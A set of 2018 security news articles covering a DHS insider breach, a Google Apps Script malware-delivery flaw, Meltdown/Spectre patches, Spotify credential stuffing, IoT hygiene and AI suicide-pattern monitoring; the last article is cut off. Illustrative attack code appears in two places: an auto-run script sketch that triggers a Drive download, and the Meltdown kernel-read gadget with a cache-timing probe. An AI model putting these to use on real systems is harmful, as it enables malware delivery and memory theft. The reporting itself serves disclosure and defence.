
DHS Discovers Privacy Incident Involving Former Employee

A former DHS OIG employee made an unauthorized copy of PII belonging to DHS employees and to parties involved in DHS OIG investigations.

A former employee of the Department of Homeland Security’s Office of the Inspector General (OIG) had an unauthorized copy of the DHS OIG investigative case management system, which contained the personally identifiable information of 247,167 current and former DHS workers, as well as of parties involved in DHS OIG investigations.

DHS OIG discovered the privacy incident on May 10, while conducting an ongoing criminal investigation with the US Attorney’s Office, reports the DHS. The PII in the unauthorized copy does not appear to have been the primary target of the former DHS OIG employee, the DHS notes.

The privacy incident affected two groups. One group included nearly a quarter million DHS workers who were with the agency in 2014. The second group involved individuals associated with DHS OIG investigations, such as witnesses and parties who lodged complaints, from 2002 to 2014.

Although DHS was able to notify affected employees who were with the agency in 2014, it could not reach individuals who were associated with DHS OIG investigations between 2002 and 2014 due to technological limitations, according to DHS. As a result, it is asking these individuals to contact AllClear ID at (855) 260-2767 for 18 months of free credit monitoring and identity protection services. A similar offering is being made to the 247,167 DHS workers.

Read more about the DHS OIG privacy incident here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/attacks-breaches/dhs-discovers-privacy-incident-involving-former-employee-/d/d-id/1330748?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google Apps Script Vulnerability Exposes SaaS to URL-based Threats

A new means of exploiting Google Apps Script lets attackers deliver malware using URLs.

Google Apps Script is vulnerable to exploits that could allow malware to be delivered via URLs. Attackers could automatically download arbitrary malware hosted in Google Drive to a machine — and the victim would have no idea it was happening.

Researchers at Proofpoint discovered the vulnerability earlier this year while exploring the potential for abuse of Google services. Ryan Kalember, senior vice president of cybersecurity strategy at Proofpoint, points to Carbanak’s use of Google services for command and control (C&C) as a public example of this.

Google Apps Script is a development platform based on JavaScript that lets developers build standalone web apps and extensions for various parts of the Google Apps ecosystem. Researchers found that this platform, along with the document-sharing capabilities in Google Apps, supports automatic malware downloads and advanced social engineering attacks designed to manipulate victims into executing malware once it’s on their machine.

“What we’re seeing is [changes in] the style of attack — normally a phishing email followed by social engineering a user to click on something,” Kalember says. “Attackers are infinitely varying that.”

This type of attack is different from phishing and malware distribution via links to Google Drive URLs, which are fairly common. These normally involve sending a Microsoft Office doc, which is enabled to run macros when the user gives permission.

In this case, all the activity happens in Google: a victim opens a link to edit a Google Doc and is prompted to run a Google Apps Script, which is embedded in the document. Most people say yes and deliver the malware, which can be hosted somewhere else within Google Drive, Kalember explains. It’s a variation of what we see with Office macros; the Doc itself is simply a way for someone to run code when it’s opened.
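Proofpoint has not published its proof-of-concept, but the general shape of the pre-fix abuse pattern can be sketched. The snippet below is illustrative only, written as a container-bound Apps Script in TypeScript (as used with Google’s clasp tooling): the file ID is a placeholder, and Google’s later restrictions on simple triggers are precisely what stop a dialog like this from appearing in another user’s editing session.

// Illustrative sketch only, not Proofpoint's proof-of-concept. A simple
// onOpen() trigger bound to a shared Doc pops a dialog whose HTML points the
// victim's browser at a direct-download link for a file hosted on Drive.
// FILE_ID is a placeholder; behaviour like this is now restricted by Google.
function onOpen(): void {
  const FILE_ID = 'HYPOTHETICAL_DRIVE_FILE_ID';
  const downloadUrl =
    'https://drive.google.com/uc?export=download&id=' + FILE_ID;
  const html = HtmlService.createHtmlOutput(
    '<script>window.top.location.href = "' + downloadUrl + '";</script>'
  ).setWidth(250).setHeight(100);
  // Before Google's fix, a simple trigger could surface UI like this in
  // another user's session, kicking off the download with no further clicks.
  DocumentApp.getUi().showModalDialog(html, 'Loading document…');
}

The point is not the specific calls but the trust model: everything the victim sees, from the link to the dialog, is served from a Google domain.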

“It would be very, very difficult to detect anything malicious,” Kalember says. “Someone could do this in a direct way: craft the URL and send the script to the victim. The Google domain is basically a trust vehicle in that case.”

To explore this vulnerability, researchers began by uploading malicious files to Google Drive. Attackers could create a public link to these executables, and share an arbitrary Google Doc to use as a lure and vehicle for a Google Apps Script designed to deliver the shared malware.

“What we’re seeing on the Google Docs side is these little scripts can be in the Doc itself, or they can be downloaded and the user can be socially engineered into running them,” says Kalember.

The ability to use extensible SaaS platforms to deliver malware is more powerful than the ability to use Microsoft Office macros for distribution, researchers report. Companies have few defensive tools to protect against this type of threat, which increases the likelihood that attackers will exploit SaaS platforms.

“This is really, really powerful stuff that Google builds from a scripting perspective, so you can do almost anything with it,” says Kalember of Google Apps Scripts. Further, most of this activity bypasses traditional security defense mechanisms.

Proofpoint disclosed this vulnerability to Google in the fall of 2017; since then, the company has added restrictions on Google Apps Script events that could be exploited. It blocked installable triggers, customizable hooks that run a script automatically when a given event occurs. It also blocked simple triggers from presenting custom interfaces in Docs editors in other users’ sessions.

These restrictions block phishing and malware delivery attempts that are triggered by opening a document, meaning exploits can no longer be leveraged for mass infections. This could have been possible before Google introduced these changes, says Kalember.

This exploit demonstrates how software-as-a-service (SaaS) applications are increasingly threatened by attackers looking for new opportunities to distribute malware and steal data.

“SaaS platforms remain something of a ‘Wild West’ for threat actors and defenders alike,” says Maor Bin, Proofpoint’s security research lead for threat systems products, in a statement. Capabilities like Google Apps Script are creating new opportunities for threat actors, who can abuse legitimate features for nefarious purposes.

Because victims in these scenarios receive legitimate links to edit Google Docs, as many people routinely do, the same rules of email security apply: use caution when clicking links to Google Docs unless you know, or can verify, the sender. Businesses using G Suite also have access to tools that show which scripts are in use in their environment, which can help raise awareness.

“In the future it might be useful for Google to try and ascertain whether a script is malicious or not before allowing a user to run it, or even host it on G Suite,” says Kalember. “Now, it’s challenging to tell whether a script is malicious or not.”


Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University.

Article source: https://www.darkreading.com/cloud/google-apps-script-vulnerability-exposes-saas-to-url-based-threats/d/d-id/1330749?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Vendors Rush to Issue Security Updates for Meltdown, Spectre Flaws

Apple says all Mac and iOS systems are affected by new side-channel attack vulnerabilities.

[UPDATED 7:20pm ET with Apple’s statement]

Wondering what to do in the wake of the revelation of newly discovered critical design flaws in most modern microprocessors? Security experts say the best bet is to apply patches for the side-channel attack vulnerabilities, which were disclosed this week. 

The vulnerabilities impact a wide range of products from numerous vendors, though not always with the same level of severity. Also impacted are servers, and in many cases the underlying infrastructure hosting cloud services. Vendors and security analysts have urged all organizations and customers to apply patches, OS updates, and other workarounds as soon as they become available, regardless of the severity of impact.

“Generally speaking, the patches to fix this move the balance back towards security,” said Paul Ducklin, senior security advisor at Sophos.

The catch, however, is that some of the fixes could reduce performance a bit, he said. “Sometimes, the price of security progress is a modicum of inconvenience. In this case, the updates might slow you down a tiny bit, but think of it as being for the greater good of all,” he noted.

Here’s a rundown of vendors that have released, or are working on, patches for the vulnerabilities, aka Meltdown and Spectre.

Intel

Intel has acknowledged the issue but said it doesn’t believe the exploits have the potential to corrupt, modify, or delete data. The processor vendor claimed that many computing devices from other vendors are susceptible to the same so-called speculative execution side-channel attacks.

As of Jan. 4, Intel has developed or is developing updates for all Intel-based PCs and servers to address problems caused by the Spectre and Meltdown exploits. The chipmaker said it hopes to have updates out for 90% of its processor products introduced over the last five years by the end of next week. The company has urged administrators and end users to check with their OS and hardware vendors and apply the updates as soon as they become available.

More details here. 

Google

According to Google, the issue has already been mitigated in many of its affected products, or wasn’t a vulnerability at all in the first place. Among its affected products are the following:

Android

Google’s monthly security update for January 2018 contains fixes for the new exploits. Specifically, the company’s Android 2018-01-05 Security Patch Level includes mitigations that limit attacks on Intel processors and on known variants of ARM processors, according to the company.

Google wants users of all Google-supported Android devices such as the Nexus 5X, Nexus 6P, Pixel C, Pixel/XL, and Pixel 2/XL to accept and install the latest security update on their devices.

Chrome

Users and administrators of current stable versions of Chrome need to enable the browser’s Site Isolation feature to protect against the threat. The feature loads each website in its own rendering process, with its own address space, to minimize the fallout from security incidents.

Information on Site Isolation and how to enable it is available here. Enterprises that want to set Site Isolation by policy on Chrome desktops can learn how to do that here.

More details here. 

Microsoft

Microsoft has released several updates to address problems caused by the vulnerabilities. Customers and organizations that have enabled automatic Windows security updates will get the fixes with Microsoft’s January 2018 patch release. Microsoft said users who have not enabled automatic updates should manually install the fixes as soon as possible. According to the company, in order for customers to be fully protected against speculative execution side-channel attacks, they may also need to install hardware and firmware updates from device vendors and in some cases from their antivirus vendors as well. Affected products include multiple versions of Windows, Windows Server, Microsoft Edge, and Internet Explorer.

More details here.  

Amazon

Amazon said that all but a single-digit percentage of its underlying cloud infrastructure systems are already protected against the three vulnerabilities.

Updates for the remaining systems will be available soon along with associated guidance on how to implement them. Updates are available for Amazon Linux and those for EC2 Windows will be made available as Microsoft patches become available.

Amazon’s updates are designed to fix underlying infrastructure issues. “In order to be fully protected against these issues, customers must also patch their instance operating systems,” the vendor said.

More details here. 

Apple

Apple was one of the last vendors to announce its patching plans. Late today, Apple said in a post that all Mac systems and iOS devices are affected by the vulnerabilities, but that it knows of no exploits “impacting customers at this time.”

The vendor said it has released mitigations in iOS 11.2, macOS 10.13.2, and tvOS 11.2 to help defend against Meltdown, and that Apple Watch is not impacted by that vuln. As for Safari, Apple will issue an update with mitigations against Spectre in “the coming days.”

“We continue to develop and test further mitigations for these issues and will release them in upcoming updates of iOS, macOS, tvOS, and watchOS,” Apple said in its statement here. 

Mozilla

As of Jan. 4, Mozilla said it was working with security researchers to understand the full impact of the newly announced vulnerabilities and to find fixes for them. In the meantime, the browser maker has implemented a short-term mitigation by disabling or, in some cases, reducing the precision of certain timers in its Firefox browser. It said it was taking the measure “since [the] new class of attacks involves measuring precise time intervals.”

“In the longer term, we have started experimenting with techniques to remove the information leak closer to the source, instead of just hiding the leak by disabling timers,” Mozilla said on its blog.
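To see why coarser timers blunt these attacks, consider a minimal TypeScript sketch of the mitigation’s effect; the step size below is illustrative rather than Mozilla’s exact figure.

// Cache-timing attacks need to tell a cached load (tens of nanoseconds) from
// an uncached one (hundreds of nanoseconds). Rounding the clock down to a
// coarse step hides that difference. Illustrative values only.
const STEP_MS = 0.02; // 20 microseconds

function coarsenedNow(): number {
  // Round the high-resolution timestamp down to the nearest step.
  return Math.floor(performance.now() / STEP_MS) * STEP_MS;
}

// With only coarsenedNow() available, a probe that times a single memory
// access sees the same value for "fast" and "slow" loads, starving the side
// channel of the signal it needs.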

More details here.

AMD 

A January 3 CMU CERT alert identified AMD’s products as being impacted by the newly discovered vulnerabilities. However, the chipmaker downplayed the severity of the threat and said its investigation showed little impact on AMD products. In an update, AMD said the bounds check bypass vulnerability (CVE-2017-5753) and the branch target injection vulnerability (CVE-2017-5715) posed only a negligible to near-zero risk to its processors. Similarly, the rogue data cache load flaw (CVE-2017-5754) had zero impact due to “AMD architecture differences,” the company noted.

AMD has not released any security fixes as of Jan. 4, and has said that any impact on its processors should be resolved via third party OS and software updates.

More details here. 

ARM

Most ARM processors are not impacted by the side-channel vulnerabilities, according to the mobile chip designer. It has released a complete list of “the small subset” of ARM-designed processors that are susceptible. Among the 10 processors impacted by at least one of the three side-channel vulnerabilities are the Cortex R7 and R8, the Cortex A8, A9, and A15, and the Cortex A73 and A75.

ARM has listed various actions Linux users can take to mitigate the threat in each of the affected processors. It has instructed users running Android to contact Google.

More details here. 

Red Hat

Red Hat has released a list of all affected versions of its Linux software and said it considers the newly announced vulnerabilities as having an “Important” security impact on its products. “While Red Hat’s Linux Containers are not directly impacted by kernel issues, their security relies upon the integrity of the host kernel environment. Red Hat recommends that you use the most recent versions of your container images,” it said.

The company said it is actively developing scripts to help users understand the impact of the vulnerabilities on their specific systems. It has released security patches for many versions of its Enterprise Linux and is working on updates for the remaining ones. It has urged users to apply the updates as soon as they become available because no other mitigations are available for the vulnerabilities.

More details here.  

SUSE

SUSE has released patches for most of its recent SUSE Linux Enterprise versions. Patches for the remaining versions will become available shortly, according to the company. SUSE has rated the three vulnerabilities as being of “critical” severity to its affected products and has set up a site that gives users continuous updates on patches as they become available.

More details here. 

VMware

VMware has released updates for its VMware ESXi, Workstation, and Fusion technologies. The company has rated the threat presented by the three vulnerabilities as being of “important” severity. “Result of exploitation may allow for information disclosure from one Virtual Machine to another Virtual Machine that is running on the same host,” the company said.

More details here. 


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/informationweek-home/vendors-rush-to-issue-security-updates-for-meltdown-spectre-flaws/d/d-id/1330753?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Social media namer and shamer charged

An 18-year-old woman in the UK has been charged with publishing the names of two sexual assault victims on social media.

A local publication, Liverpool Echo, reports that Sophie Turner, of Merseyside, has been charged with two counts of publishing the names of the victims of a sexual offense and with two counts of harassment.

Turner allegedly posted messages in July about two victimized teenage girls following the sentencing of the two men who assaulted them. She’s now out on bail and due to appear at Liverpool Magistrates Court on 7 March.

The Echo says this is the first time somebody’s been charged with this particular crime in Merseyside, but it’s not the first time it’s happened in the UK.

One such case involved the infamous rape conviction of footballer Ched Evans in 2012 (a conviction that was later quashed, with Evans acquitted at a retrial). Ten people were accused of naming the victim on social media, including on Facebook and Twitter.

According to The Guardian, some of the defendants said the victim was “crying rape” and called her names. One tweet read: “She is to blame for her own downfall. Let’s find her address.”

As in many other countries, publicly naming rape victims is illegal in the UK. Victims of sexual assault are entitled to anonymity for life under the Sexual Offences Act 2003. It’s not just verboten for media; anyone can be convicted for identifying a victim.

The rationale for keeping victims’ names secret is that sex crimes are already widely under-reported: in 2012, the British Crime Survey found that about 89% of rape victims hadn’t reported the crime to police. What’s more, the conviction rate is vanishingly small: a recent documentary on rape reported that only 3% of rapes in the UK end in a conviction. Victims claim that they’re blamed for the crime or simply not believed. Anonymity is one way to battle the victim-blaming and slut-shaming that keep the crimes unreported and the criminals out of court.

But being tried and convicted by a village mob on social media affects a far more diverse collection of people, above and beyond sexual assault victims. Victims themselves have, most particularly in these post-Harvey Weinstein times, taken to social media to name their attackers, often in lieu of reporting the crimes to the police.

As Vice has reported, that does both the accused and the accuser a great disservice: the accused have been harassed, without the chance to answer their accusers in a court of law. The accusers, by skipping over anonymity and a police report and by publishing their accounts, jeopardize their chances of getting an untainted jury if the case makes it to court.

Overexposure on social media has even turned an innocent, dweeby dad into a pariah: the “creep” who was shamed on Facebook for allegedly taking photos of children in a mall (he was actually taking a selfie with a Darth Vader cutout to show his kids) comes to mind.

…and after the truth came out, the woman who shamed him was herself turned into a pariah.

Sometimes – at least where Facebook, Twitter and the rest are concerned – silence is golden. Sometimes, if not most times, and for a range of reasons, it’s best to keep people’s names, their photos and our assumptions off social media.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/gjeJ84_JHXU/

US Homeland Security breach compromised personal info of 200,000+ staff

More than 240,000 current and former employees of the US Department of Homeland Security have had their personal details exposed in a data breach.

In what it describes somewhat euphemistically as a “privacy incident”, the DHS said the breach could also affect anyone who was part of an investigation by the DHS Office of Inspector General between 2002 and 2014.

The breach was discovered in May 2017, when – as part of an ongoing criminal investigation – the DHS found a former employee had an unauthorised copy of the office’s investigative case management system.

The DHS was at pains to emphasise that the “evidence indicates that… personal information was not the primary target” and that the incident wasn’t a “cyber attack by external actors”.

But it still led to the unauthorised transfer of the personally identifiable information – including name, social security number and position – of 247,167 federal government staff employed by the DHS in 2014.

On top of that, it affects an undefined number of people that were under investigation by the office between 2002 and 2014 – this could be subjects, witnesses and complainants, and is not limited to DHS employees. That information could include name, social security number, address, phone number and date of birth.

Current and former staff were contacted on December 18, 2017, but the department said it was “unable to provide direct notice to the individuals affected by the Investigative Data”.

Clearly anticipating the question of why it took them seven months to alert affected individuals after discovering the breach, the DHS’s canned statement said:

The investigation was complex given its close connection to an ongoing criminal investigation. From May through November 2017, DHS conducted a thorough privacy investigation, extensive forensic analysis of the compromised data, an in-depth assessment of the risk to affected individuals, and comprehensive technical evaluations of the data elements exposed. These steps required close collaboration with law enforcement investigating bodies to ensure the investigation was not compromised.

In a bid to reassure people that this wouldn’t happen again, the department said it was placing “additional limitations” on who gets back end access to case management systems, as well as implementing additional network controls to identify unusual access patterns.

In addition, it said it would be “performing a 360-degree review of DHS OIG’s development practices related to the case management system”.

It added that anyone potentially affected was being offered 18 months of free credit monitoring and identity protection services. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/04/us_homeland_security_breach_exposed_personal_info_of_200000_staff/

The Internet of (Secure) Things Checklist

Insecure devices put your company in jeopardy. Use this checklist to stay safer.

In October 2016, as a botnet strung together by the Mirai malware launched the biggest distributed denial-of-service attack in history, I was, appropriately enough, giving a talk on Internet of Things (IoT) security and privacy at the Grace Hopper Conference. As I learned of the attack, and as questions came in from the audience about the malware, I knew that the topic of my session could not have been more timely. In this instance, and in countless others, IoT security is a core issue. Security professionals need to be concerned about insecure devices.

More than a year later, IoT continues to be a growing concern. From Internet-connected toaster ovens to smart hairbrushes to popular health trackers, these devices can be risky, especially when used in certain environments. Given the prevalence of these devices coming in and out of corporate networks, not only is it important to be ready to protect your own organization, but it is crucial to understand how far IoT risk can extend. 

As the AT&T IoT Cybersecurity Alliance highlighted in a recent white paper, Mirai was a prime example of the type of risk posed by unsecured IoT devices. The obvious threat is exposure of personal data to an attacker who compromises a device. However, according to the report, if the connected devices within your organization are used as part of a widespread attack, your organization could suffer reputational damage or, worse, be victimized by a compromised IoT device belonging to a business partner.

Just like any type of cyberattack, the implications of an IoT attack are far-reaching. This is why it is important for security professionals to approach IoT security just as they would network, endpoint, and cloud security. A comprehensive cyber hygiene strategy is a necessary component of securing your organization and preventing cyber attacks.

Security teams should review their current priorities and reference this basic IoT security hygiene checklist:

  1. Assess your company’s overall risk acceptance. Every company has a different view of the types of risks they are willing to accept, and it’s critical you understand your company’s overall risk acceptance. This is an important first step, as it will help you determine which devices you will allow to connect and which devices you will need to block. For example, some companies may find it to be low-risk if users connect health-tracking devices to company laptops, allowing them to transfer personal health data. Other companies with a different security posture may find this to be a high risk.
  2. Develop an IoT awareness and training program.  Employees need to be aware of the risk that connected devices present. In order for them to be IoT savvy, they need proper resources and training. An integral part of developing their awareness is making sure they understand how their personal devices are part of the bigger picture and overall security of their workplace — and what is allowed and what is not. Training also should include how to do IoT health checks to determine if devices are secure. It is important to provide employees with the tools needed to protect themselves and the organization, whether that means a required course on IoT risk and cyber hygiene or a video starring the executive staff that demonstrates possible IoT threat scenarios.
  3. Practice what you preach. A personal device hygiene check is always a good reminder about the importance of IoT security. Going through this process yourself will help you figure out what should be included in your company’s IoT hygiene program. I make a habit of regularly checking through the apps on my phone to see what access they have. Many devices request access to photos, location information, and contacts; ask yourself if you want to allow this. Keeping IoT devices up to date and ensuring the proper privacy settings are in place are important steps for securing your own device and for securing the networks and other devices that they connect to, including company laptops and mobile phones.

Gartner predicts that more than 20 billion connected devices will be in operation by 2020, rising from 8.4 billion in 2017. The security investments made by companies creating these billions of devices are just as diverse as the devices themselves. Some IoT companies are investing a lot in security, while others are focusing only on creating connected devices — and security may be an afterthought. As security practitioners, we should take this into consideration when assessing IoT risk for our organizations and users. There is a lot we can do to ensure we are one step ahead when it comes to IoT security.


Rinki Sethi is Senior Director of Security Operations and Strategy at Palo Alto Networks. She is responsible for building a world-class security operations center that includes capabilities such as threat management, security monitoring, and threat intelligence. Rinki is also …

Article source: https://www.darkreading.com/endpoint/the-internet-of-(secure)-things-checklist/a/d-id/1330689?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Artificial Intelligence to listen for suicidal thoughts on social media

Canada is planning a pilot project to see if Artificial Intelligence (AI) can find patterns of suicidality – i.e., suicidal thoughts or attempts, self-harm, or suicidal threats or plans – on social media before they lead to tragedy.

According to a contract award notice posted by the Public Health Agency of Canada (PHAC), the $99,860 project is being handled by an Ottawa-based AI company called Advanced Symbolics Inc. (ASI). The agency says the company was the only one that could do it, given that ASI has a patented technique for creating randomized, controlled samples of social media users in any geographic region.

The focus on geographic region is key: As it is, the country is reeling after a dramatic spike in suicides in Cape Breton among girls 15 years old and younger and men in their late 40s and early 50s.

The idea isn’t to identify specific individuals at risk of suicide. Nor is it to intervene. Rather, the project’s aim is to spot patterns on a regional basis so that public health authorities can bolster mental health resources to regions that potentially face suicide spikes.

The project is set to begin this month and finish by the end of June, if not before.

First, the PHAC and ASI will work to broadly define these suicide-related behavior terms: ideation (i.e., thoughts), behaviors (i.e., suicide attempts, self-harm, suicide) and communications (i.e., suicidal threats, plans). The next phase will be to use the resulting classifier to research the “general population of Canada” in order to identify patterns associated with users who discuss suicide-related behavior online.
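ASI’s patented sampling and classification techniques are not public. As a rough illustration of the general idea, classifying public posts against the agreed terms and aggregating counts by region rather than flagging individuals, a deliberately naive TypeScript sketch might look like this; the term list, data shapes, and threshold logic are placeholders, not ASI’s methodology.

// Naive illustration only. Real systems would use far more sophisticated
// classifiers; the terms below are placeholders.
const IDEATION_TERMS = ['placeholder term one', 'placeholder term two'];

interface PublicPost {
  region: string;
  text: string;
}

// Count matching public posts per region without recording anything about
// individual authors.
function regionalSignal(posts: PublicPost[]): Map<string, number> {
  const counts = new Map<string, number>();
  for (const post of posts) {
    const text = post.text.toLowerCase();
    if (IDEATION_TERMS.some((term) => text.includes(term))) {
      counts.set(post.region, (counts.get(post.region) ?? 0) + 1);
    }
  }
  return counts;
}

// Public-health teams would then watch for regions whose counts climb well
// above their historical baseline, rather than acting on any single post.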

According to CBC News, PHAC says that suicide is the second-leading cause of death for Canadians aged 10 to 19. The news outlet quoted an agency spokesperson:

To help prevent suicide, develop effective prevention programs and recognize ways to intervene earlier, we must first understand the various patterns and characteristics of suicide-related behaviors.

PHAC is exploring ways to pilot a new approach to assist in identifying patterns, based on online data, associated with users who discuss suicide-related behaviors.

Kenton White, chief scientist with ASI, told CBC News that nobody’s privacy is going to be violated.

It’d be a bit freaky if we built something that monitors what everyone is saying and then the government contacts you and said, ‘Hi, our computer AI has said we think you’re likely to kill yourself’.

ASI’s AI will be trained to flag particular regions where suicide may be likely. In Cape Breton, for example, three middle-school students took their lives last year.

White said that there are patterns to be gleaned from Cape Breton’s spike in suicides. The same can be said for patterns that White says have appeared in suicides in Saskatchewan, in Northern communities, and among college students.

ASI CEO Erin Kelly told CBC News that the AI won’t analyze anything but public posts:

We’re not violating anybody’s privacy – it’s all public posts. We create representative samples of populations on social media, and we observe their behavior without disturbing it.

CBC News reports that ASI’s technology could give regions a two- to three-month warning before suicides potentially spike – what could be a vital beacon that government officials could act on by mobilizing mental health resources before the suicides take place.

This isn’t the first time that technology has been applied to suicide prevention. At least as early as 2013, Facebook was working with researchers to put its considerable data mining might to use to try to discern suicidal thoughts by sifting through the social media streams and risk factors of volunteers. Such risk factors include whether a person is male (making suicide more likely), married (less likely) or childless (more likely).

Facebook and researchers at the Geisel School of Medicine at Dartmouth recruited military veterans as volunteers: a group with a high suicide rate.

At that early stage, Facebook, like PHAC and ASI, didn’t include intervention. The researchers weren’t empowered to intervene if suicide or self-harm was flagged.

Since then, Facebook has introduced technologies geared at intervention.

In March 2017, Facebook said it planned to update its algorithms so as to “listen” for people in danger of suicide. The idea was to look out for certain key phrases and then refer the matter to human beings on the Facebook staff, who would then ask whether the writer was OK.

The move followed a similar attempt on Twitter by the Samaritans in 2014. That attempt was aborted in a matter of months as critics lambasted the project’s design due to privacy concerns – it was criticized for enabling stalking, given that users couldn’t opt out.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/seHxp_JVi1Y/

Is your Spotify password up to scratch?

If you’re among the 140 million users who enjoy streaming music from Spotify – especially if you are one of its 60 million paying customers for “premium” services – you might want to make sure you have a strong, long and unique password on your account. If not, you could be letting cybercriminals in.

Collective Labs’ Ryan Jackson came across a brute force hacking tool called Spotify Cracker v1 last month, which automatically cycles through known username and password combinations and breaks into Spotify accounts that use those credentials.

Jackson, 17, who reportedly has a history of involvement with the hacking groups New World Hackers and Lizard Squad (“while never participating in their antics”), told the International Business Times (IBT) that he found the tool on a private server on Discord – a popular, free online communications platform used primarily by gamers.

And given current Spotify login security protocols – the company doesn’t use CAPTCHAs or offer two-factor authentication (2FA) – it doesn’t meet much resistance. Without mechanisms to lock down an account after a certain number of incorrect password guesses, a brute force attack can simply keep guessing until it is successful.
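The missing control is not exotic. A minimal TypeScript sketch of the kind of per-account throttling the service apparently lacks might look like the following; the thresholds and in-memory store are illustrative, not a description of Spotify’s backend.

// Illustrative only: a per-account failed-login counter with a lockout.
const MAX_FAILURES = 5;
const LOCKOUT_MS = 15 * 60 * 1000; // 15 minutes

interface LoginState {
  failures: number;
  lockedUntil: number;
}

const attempts = new Map<string, LoginState>();

// Refuse the attempt outright while the account is locked out.
function allowLoginAttempt(account: string, now: number = Date.now()): boolean {
  const state = attempts.get(account);
  return state === undefined || now >= state.lockedUntil;
}

// Record a failed guess; too many in a row triggers the lockout.
function recordFailure(account: string, now: number = Date.now()): void {
  const state = attempts.get(account) ?? { failures: 0, lockedUntil: 0 };
  state.failures += 1;
  if (state.failures >= MAX_FAILURES) {
    state.lockedUntil = now + LOCKOUT_MS;
    state.failures = 0;
  }
  attempts.set(account, state);
}

Without a check like this, or a CAPTCHA in front of it, a tool can simply iterate through leaked email and password pairs as fast as the server will answer.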

Hackers can easily collect login credentials – email addresses and passwords – that have been compromised from other breaches and are available on dark web marketplaces, sometimes for free, and then plug in those credentials to find a Spotify account associated with them.

Jackson tried it himself. He found a collection of emails and passwords on Pastebin – the anonymous service that lets people host text for free – and said that it took him about 15 minutes to break into 100 accounts using the tool. He said someone could simply let the tool run all night and wake up to another 20,000 compromised accounts.

Spotify, based in Sweden, didn’t respond to a request for comment, but IBT reported that the company said it had not been breached and that “our user records are secure.” A spokesperson added:

We do however pay attention to breaches of other services, and take steps to help our users secure their Spotify accounts when those occur, because many people use the same login and password combination for multiple services. Therefore, we review sites such as Pastebin and others for leaked user credentials which might be used to access Spotify.

The company didn’t respond to questions about whether any of those “steps” would include adding more robust security features to its login process.

Still, its lack of login security, even after Collective notified it about Spotify Cracker, has prompted some well-deserved criticism, including a pointed tweet from high-profile security blogger Brian Krebs.

CAPTCHAs and 2FA aren’t cutting edge – they’re basic security hygiene that any company with 140 million users ought to have in place.

Until that changes, it’s up to users to protect themselves.

Which means making sure your password is complicated and robust, and not using the same one for any other online account.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/yRKbcUPjmso/

Meltdown, Spectre: The password theft bugs at the heart of Intel CPUs

Summary: The severe design flaw in Intel microprocessors that allows sensitive data, such as passwords and crypto-keys, to be stolen from memory is real – and its details have been revealed.

On Tuesday, we warned that a blueprint blunder in Intel’s CPUs could allow applications, malware, and JavaScript running in web browsers to obtain information they should not be allowed to access: the contents of the operating system kernel’s private memory areas. These zones often contain files cached from disk, a view onto the machine’s entire physical memory, and other secrets. All of this should be invisible to normal programs.

Thanks to Intel’s cockup – now codenamed Meltdown – that data is potentially accessible, meaning bad websites and malware can attempt to rifle through the computer’s memory looking for credentials, RNG seeds, personal information, and more.


On a shared system, such as a public cloud server, it is possible, depending on the configuration, for software in a guest virtual machine to drill down into the host machine’s physical memory and steal data from other customers’ virtual machines. See below for details on Xen and VMware hypervisor updates.

Intel is not the only one affected: Arm and AMD processors are, too – to varying degrees. AMD insisted there is a “near-zero” risk its chips can be attacked in some scenarios, but its CPUs are vulnerable in others. The chip designer has put up a basic page that attempts to play down the impact of the bugs on its hardware.

Arm has produced a list of its affected cores, which are typically found in smartphones, tablets and similar handheld gadgets. That list also links to workaround patches for Linux-based systems. Nothing useful from Intel so far.

This is, essentially, a mega-gaffe by the semiconductor industry. As they souped up their CPUs to race them against each other, they left behind one thing in the dust. Security.


One way rival processors differentiate themselves, and perform faster than their competitors, is to rely on speculative execution. In order to keep their internal pipelines primed with computer code to obey, they do their best to guess which instructions will be executed next, fetch those from memory, and carry them out. If the CPU guesses wrong, it has to undo the speculatively executed code, and run the actual stuff required.

Unfortunately, the chips in our desktop PCs, laptops, phones, fondleslabs, and backend servers do not completely walk back every step taken when they realize they’ve gone down the wrong path of code. That means remnants of data they shouldn’t have been allowed to fetch remain in their temporary caches, and can be accessed later.

The trick is to line up instructions in a normal user process that cause the processor to speculatively fetch data from protected kernel memory before performing any security checks. The crucial Meltdown-exploiting x86-64 code can be as simple as…

; rcx = kernel address
; rbx = probe array
retry:
  mov al, byte [rcx]          ; speculatively read one byte from the kernel address
  shl rax, 0xc                ; multiply it by 4096 so each value maps to its own page
  jz retry                    ; if the read was squashed to zero, try again
  mov rbx, qword [rbx + rax]  ; touch the probe array at that offset, caching one page

Trying to fetch a byte from the kernel address as a user process triggers an exception – but the subsequent instructions have already been speculatively executed out of order, and touch a cache line based on the content of that fetched byte.

An exception is raised, and handled non-fatally elsewhere, while the out-of-order instructions have already acted on the content of the byte. Doing some Flush+Reload magic on the cache reveals which cache line was touched and thus the content of the kernel memory byte. Repeat this over and over, and eventually you dump the contents of kernel memory.
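For the curious, the “reload” half of that step can be sketched in TypeScript roughly as it might have looked in a browser before vendors coarsened their timers. The speculative access is assumed to have happened already; the stride and probe array are illustrative, and on its own this is a timing probe, not a working exploit.

// Sketch of the reload/probe phase only. Earlier, speculatively executed code
// is assumed to have touched probe[secretByte * STRIDE]; the element that now
// loads fastest reveals the value of the secret byte.
const STRIDE = 4096; // one page per possible byte value
const probe = new Uint8Array(256 * STRIDE);

function recoverByte(): number {
  let best = 0;
  let bestTime = Infinity;
  for (let value = 0; value < 256; value++) {
    const start = performance.now();
    const touched = probe[value * STRIDE]; // fast only if already cached
    const elapsed = performance.now() - start;
    if (elapsed < bestTime) {
      bestTime = elapsed;
      best = value;
    }
    void touched; // keep the read from being optimized away
  }
  return best;
}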

